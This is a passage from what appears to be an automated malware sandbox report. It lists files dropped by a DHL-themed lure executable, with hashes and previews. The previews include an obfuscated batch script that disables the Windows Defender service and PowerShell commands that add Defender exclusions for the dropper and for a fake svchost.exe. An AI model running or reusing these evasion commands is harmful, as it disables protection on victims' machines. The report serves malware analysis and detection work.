	New Order.exe	Get hash	malicious	Browse
	PO#87498746510.exe	Get hash	malicious	Browse
	TT.exe	Get hash	malicious	Browse
	TT.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.599842240294713
Encrypted:	false
SSDEEP:	6:bl/ek1GaD0JOCEfMuaaD0JOCEfMKQmDy/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bdNGaD0JcaaD0JwQQCtAg/0bjSQJ
MD5:	6F61DEA46D7A2AFAAB41B4070D759295
SHA1:	4A2437508009FF723BBA2CB5DDEC269CE15F9092
SHA-256:	57D2811971E5CFDB68E8431DC241DFD1E9175D6B41CFC82800A15343A4E40C22
SHA-512:	6391DFDD7048ED42AB216347FAD27CC25EFA773764ED699ADD4BE648D8D1906A18997F26745CC39BEECFFBE86759C25635C5AAF5CE26E91EF81CE95C030C7D46
Malicious:	false
Preview:	....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xfdcbf2ba, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09625771879899726
Encrypted:	false
SSDEEP:	6:LfzOsAzwl/+31RIE11Y8TRXq1qKNfzOsAzwl/+31RIE11Y8TRXq1qK:rzDA0+lO4blq1qKNzDA0+lO4blq1qK
MD5:	1E6534AB1157D151BB0B375A38157E62
SHA1:	4E3C06FBB751B48F857F844489ED5A71DA36BF96
SHA-256:	639AA1AB9D16ADE253B48177E182EB28D4441EB094E6B4E871F476B0D77D1A7F
SHA-512:	5A6B18B60C607065CEA5BA1F2843939846B434E388D6F40F465ED23E0B555F1D2F4CB3CEDBA642541C44E66ABDE3F4A25DB2299BA3D5116BA42CB78C3841FCCA
Malicious:	false
Preview:	...... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................y..;.....y...................8......y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11227145912104357
Encrypted:	false
SSDEEP:	3:uQ/7Evz5ncr+j8l/bJdAtiadXill:uQ/i1nu+j8t4f1G
MD5:	E7E5B09291619E6ED7048AA6633A27B4
SHA1:	F862C511B3C9FA4D704B051DE8F82C268B1B1F27
SHA-256:	691CE1872FC854A85D88B875EF6AC93168840FB30FBDB1A21392CBBC9B4C644A
SHA-512:	96AC232595C858DA2C8AFB9D6E97536152D1770A83914ECFF49E343FFBBF92B51F0EF409DDDEF4486840F21885EF294D24401080625F666688F7A6FCC8265E45
Malicious:	false
Preview:	.vN......................................3...w.......y.......w...............w.......w....:O.....w....................8......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CDC.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Feb 25 19:05:43 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	310751
Entropy (8bit):	3.924033646152372
Encrypted:	false
SSDEEP:	3072:5oN/JXd0fjd+pO6Dr5CvnK9gIOgF5T0FUCgUhW1z9FP8C1:5Qn0YpIvK9RpDTsTjh4FZ
MD5:	0B37C4E76165F0F8BC3BDB6C49EF73BE
SHA1:	FD43FB2ED3D844C762DBD19FDBF87047BE0F9C71
SHA-256:	9B0DBF8E7CB28B1BF075E4F0377E732BE016489AECA26674B6F20E97F31A25B9
SHA-512:	3E57184B64FDAFB28787AD185A71A5F770EEC5428CBCB06C30F7965E8BF51AC5E7B2A553B7ACB54D0B8C80D72C48A539553DEA4F6F6D82514AD7D661852B5643
Malicious:	false
Preview:	MDMP....... .........7`...................U...........B.......-......GenuineIntelW...........T.............7`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB146.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8478
Entropy (8bit):	3.6963698277077177
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiajX6fCf6YIzmSUoQdxYgmfZESlCprq89bf5sfXB1m:RrlsNicX6i6YdSUoAugmfGSOfSfa
MD5:	64224C14CE5937E2E186641BBBF8B6ED
SHA1:	55C0F5DA37FA39C82F9C8123413A7B32741427ED
SHA-256:	B72481E23AA36ABE05B6E7BC1F23F55EB5F7F48E49A058A40A5D70ACFF76F561
SHA-512:	D85E172916766CA7010BD6DAB40001EEF74387F1B33804F26488B140C86BBCF23246692FBCE038EDCFD905A9006B07C767A8B1155B5AB26C94039F5582F34C60
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA40.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4779
Entropy (8bit):	4.504512037902914
Encrypted:	false
SSDEEP:	48:cvIwSD8zspJgtWI9fvWSC8Bk8fm8M4JmFFbE++q8v5brisZJQN7d:uITf7U+SNXJKE+Kdrlq7d
MD5:	B7572ACB61B50439E97B6B5AC21AA9B8
SHA1:	369F1EBF65248A5448AC2BC374710E15C5978263
SHA-256:	40885DCC60CE8A3584EEDC6543F4236147DC9B098444053CD51AFBC997B9F336
SHA-512:	AE3E1FF4FB86B4058D0B5F0316AA87C90E6A0A394F35A471EB4301719733DDDA56E0E8B243D9C56FFD6AD68950B0CF14DB448885A9BFD936C4CB26578A9142BA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="877216" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA6D.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	53038
Entropy (8bit):	3.0506082513097774
Encrypted:	false
SSDEEP:	1536:AkHI3BuivARR1sCXq1iZxvl/HgkyCOTcezr/zWb8SzuNctG:AkHI3BuivARR1sCXq1iZxvl/HgzCOTcG
MD5:	C1ECD9CCFEAEF5CB9E0ADB8447D439E9
SHA1:	EAC5693874A6B3275E75B964B0CDE9B3CE844A3E
SHA-256:	54AF9F89796EF54CA43316CD45A9D9EFD8C17BB609627EFB0C0E8C595E73618A
SHA-512:	A088356D30D3D28AD807AC9C7F0FB7B149B91D7A8F0E5FC829B629C81E2F863747033E7161CED30463F5EA220954AF2E24BC48D9F1E0FEE410551DA1040ED6E4
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC105.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.705427748316365
Encrypted:	false
SSDEEP:	96:9GiZYWl1Pdi4YEYL8V74XHwUYEZ0kGCtViOPYHrnwAnNAaJgBvJ2FI/iDC:9jZDHZzhFk6KaJgBv4a6DC
MD5:	377971C7CBF8626D6D66041FC8A692DA
SHA1:	0C4653A8E9435E04750AAF24FD046AC4CB551A5C
SHA-256:	79F474885A49DA3B953D6E9C5A10D1D81871E1DD91314ADBA1830375E8D2AB79
SHA-512:	42CE25B7B2EEBCEBBCBFB65514991F9BB3FCBA5E216DEAE970F422A9914810BB47C624BA21EA551F6C932EB57321160356DA7BD09857F122F304768E14CC4FEB
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:	8D5E194411E038C060288366D6766D3D
SHA1:	DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:	44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:	21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bb22kea.eza.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pajpkrdd.mb4.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uefhrjb0.45o.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmbheasb.dva.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe Download File
Process:	C:\Users\user\Desktop\DHL_document1102202068090891.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: em6eElVbOm.exe, Detection: malicious, Browse Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse Filename: Fireman.exe, Detection: malicious, Browse Filename: NEW ORDER.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse Filename: Vrxs6evJO7.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse Filename: RMe2JcmlSh.exe, Detection: malicious, Browse Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse Filename: New Order.exe, Detection: malicious, Browse Filename: PO#87498746510.exe, Detection: malicious, Browse Filename: TT.exe, Detection: malicious, Browse Filename: TT.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat Download File
Process:	C:\Users\user\Desktop\DHL_document1102202068090891.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	8399
Entropy (8bit):	4.665734428420432
Encrypted:	false
SSDEEP:	192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:	B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:	F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:	27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:	8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:	false
Preview:	@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators, with overstriking
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:7p2:7I
MD5:	D1F2CC85CC903AFAE9E16791EE3F2B26
SHA1:	6EB6AD0657BBC69B6594E2AD6658A0CCFDE58A04
SHA-256:	4BC19E8C1E3025FE7B027ADFB6042596A36D9C669EFE56CE027F899E4A635C0A
SHA-512:	1F640968FBE496787A1FE862E8AAD6354A2C3258E7FC14405DF1C7114158FD1AFDB6DA1FAC34456521008D00D7D8F75F56F3BA7C82ABD4886ACF586EDE07D74A
Malicious:	true
Preview:	...L...H

C:\Users\user\Documents\20210225\PowerShell_transcript.124406.4bCMkNpA.20210225110448.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5649
Entropy (8bit):	5.4231613802712015
Encrypted:	false
SSDEEP:	96:BZ0D/FNrqDo1ZavZK/FNrqDo1Zs/NHjZs/FNrqDo1Z2K33S:5
MD5:	9762BDE81EC8299956573C81245B0247
SHA1:	722B71D405799641C901B5A233EFC74C0EA16ED2
SHA-256:	B2F3C828F1A39A968C2293A45DD56DB43AE513C232ED85F066EB40DF87359CA6
SHA-512:	2FFBCDFBF4DE00920DE5F75A57240E92F9B4E4D4B78C124998E1DF52E08C0D9EE5B79CA8660F5A9675B09AEB24A4246AE76906BDB6D9F32C25C5384EAC51B458
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210225110505..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe -Force..Process ID: 6016..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210225110505..******************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe -Force..********************..Windows PowerShell transcript start..Start time: 20210225110745..Username: computer\alf

C:\Users\user\Documents\20210225\PowerShell_transcript.124406.Axx9VKwJ.20210225110505.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	884
Entropy (8bit):	5.337722528145989
Encrypted:	false
SSDEEP:	24:BxSARDvBBFx2DOXUWeSuVyWiHjeTKKjX4CIym1ZJX+uVm:BZZv/FoO+SmFiqDYB1Zwmm
MD5:	F8A4573D1BFBAE54B6956FC412E7F3BD
SHA1:	8A89BF48C9B4E062A446C5162A06CB31D8436869
SHA-256:	A03796FEA0E2EDE037B5AE9708A869BF4596F596A7AB2BD3F8E96E7806175A55
SHA-512:	1BC03102B27E8905FDE25F5F682F430CB956562E0B60FCAFA606769493078264F0261B028D271C832021BA9ED940B3705AFB1E258D9FE533AE15589B0F1BAC51
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210225110537..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DHL_document1102202068090891.exe -Force..Process ID: 6624..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210225110538..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DHL_document1102202068090891.exe -Force..

C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe Download File
Process:	C:\Users\user\Desktop\DHL_document1102202068090891.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61312
Entropy (8bit):	4.689809082227129
Encrypted:	false
SSDEEP:	768:942TTm1gTCbgfWalSZXHIWSjSjSjSjSjSjSGAo+UHHyh:dm1gTvfWtZXoWSjSjSjSjSjSjSGA3GH
MD5:	5E86EC60BC329DB96BE8D476537A554C
SHA1:	2881B03BD6A77DC83774E29A93746B52DBB5F568
